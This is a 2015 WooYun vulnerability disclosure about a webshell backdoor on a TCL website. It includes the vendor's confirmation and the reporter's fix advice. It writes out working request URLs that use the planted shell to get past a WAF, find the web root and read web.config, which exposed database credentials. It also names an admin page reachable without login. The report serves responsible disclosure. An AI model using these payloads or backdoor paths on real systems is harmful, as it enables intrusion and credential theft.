当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150456

漏洞标题:TCL某站shell一枚(此处应有WAF)

相关厂商:TCL官方网上商城

漏洞作者: wefgod

提交时间:2015-10-29 21:41

修复时间:2015-12-14 09:00

公开时间:2015-12-14 09:00

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

TCL某站的shell一枚……应该是上了某颜色公司的waf。顺便有一处疑似越权的页面,但是似乎做不了啥

详细说明:

这网站以前是绩效管理的……我曾经在我的漏洞里面提到过他
现在不知道是用来干嘛的了

漏洞证明:

http://cts.tcl.com/
后门地址:
http://cts.tcl.com/admin/images/!.aspx
直接用菜刀访问:

image042.png


经过其他一些测试,已经上了WAF,阻断哦,某些情况下可以看出这是某颜色公司的WAF特征
换一个形式即可:
http://cts.tcl.com/admin/images/!.aspx?w=Response.Write(HttpContext.Current.Server.MapPath("FileName"));;Response.End();&z1=RDpcXFdlYlJvb3RcXGN0c1xc

image043.png


稍微绕一下waf,可以获取到web目录为:
D:\WebRoot\cts\
获取web.config的内容:
http://cts.tcl.com/admin/images/!.aspx?w=var m=new System.IO.StreamReader("D:/WebRoot/cts/web.config",Encoding.Default);Response.Write(m.ReadToEnd());m.Close();Response.End();&z1=RDpcXFdlYlJvb3RcXGN0c1xc
下图已经获取到数据库地址和密码

image045.png


数据库……sa/1?

image047.png


最后,貌似还有一个未授权访问?不过估计就是摆设哈
http://cts.tcl.com/admin/index.html

image049.png

修复方案:

删除此shell。未授权访问那个,根据实际情况看看

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 08:58

厂商回复:

该系统正在改造,准备升级后重新上线,但是主机上的木马没有删除,感谢您的提醒.谢谢对TCL的关注与关心.

最新状态:

暂无